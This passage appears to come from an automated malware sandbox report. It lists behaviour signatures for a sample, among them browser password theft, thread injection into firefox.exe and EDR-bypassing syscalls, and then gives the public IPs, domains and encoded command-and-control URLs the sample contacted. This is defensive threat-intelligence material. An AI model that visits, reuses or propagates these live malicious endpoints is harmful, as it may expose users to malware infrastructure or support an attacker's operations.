(via file / registry access) 23->56 58 Tries to harvest and steal browser information (history, passwords, etc) 23->58 60 Modifies the context of a thread in another process (thread injection) 23->60 62 3 other signatures 23->62 26 pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe 23->26 injected 30 firefox.exe 23->30         started        process12 dnsIp13 38 shops.myshopify.com 23.227.38.74, 49711, 80 CLOUDFLARENETUS Canada 26->38 40 www.lacemalt.top 203.161.55.102, 49726, 49727, 49728 VNPT-AS-VNVNPTCorpVN Malaysia 26->40 42 6 other IPs or domains 26->42 70 Found direct / indirect Syscall (likely to bypass EDR) 26->70 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
43.155.26.241
 www.cwgehkk.store Japan 4249 LILLY-ASUS false
203.161.55.102
 www.lacemalt.top Malaysia
45899 VNPT-AS-VNVNPTCorpVN false
108.179.193.98
 siteblogoficialon.com United States
46606 UNIFIEDLAYER-AS-1US false
74.208.46.171
 www.lavillitadepapa.com United States
8560 ONEANDONE-ASBrauerstrasse48DE false
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS true
84.32.84.130
 www.kosherphonestore.com.cdn.hstgr.net Lithuania
33922 NTT-LT-ASLT false
3.33.130.190
 mybodyradar.net United States
8987 AMAZONEXPANSIONGB false
35.241.34.216
 www.mg55aa.xyz United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
www.lacemalt.top 203.161.55.102 true
www.kosherphonestore.com.cdn.hstgr.net 84.32.84.130 true
siteblogoficialon.com 108.179.193.98 true
www.mg55aa.xyz 35.241.34.216 true
www.cwgehkk.store 43.155.26.241 true
shops.myshopify.com 23.227.38.74 true
www.lavillitadepapa.com 74.208.46.171 true
mybodyradar.net 3.33.130.190 true
www.gospelstudygroup.org unknown unknown
www.amkmos.online unknown unknown
www.mybodyradar.net unknown unknown
www.valerieomage.com unknown unknown
www.instantmailer.cloud unknown unknown
www.kosherphonestore.com unknown unknown
www.mcxright.com unknown unknown
www.siteblogoficialon.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.valerieomage.com/c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp true
  • Avira URL Cloud: safe
 unknown
http://www.mg55aa.xyz/7npk/ false
  • Avira URL Cloud: safe
 unknown
http://www.siteblogoficialon.com/xti2/ false
  • Avira URL Cloud: safe
 unknown
http://www.lacemalt.top/tb8p/ false
  • Avira URL Cloud: safe
 unknown
http://www.kosherphonestore.com/ktbm/ false
  • Avira URL Cloud: safe
 unknown
http://www.lacemalt.top/tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp false
  • Avira URL Cloud: safe
 unknown
http://www.mybodyradar.net/nml2/ false
  • Avira URL Cloud: malware
 unknown
http://www.cwgehkk.store/kwl6/ false
  • Avira URL Cloud: safe
 unknown
http://www.mg55aa.xyz/7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== false
  • Avira URL Cloud: safe
 unknown
http://www.lavillitadepapa.com/i1fz/ false
  • Avira URL Cloud: safe
 unknown
http://www.siteblogoficialon.com/xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp false
  • Avira URL Cloud: safe
 unknown
http://www.cwgehkk.store/kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp false
  • Avira URL Cloud: safe
 unknown
http://www.kosherphonestore.com/ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp false
  • Avira URL Cloud: safe
 unknown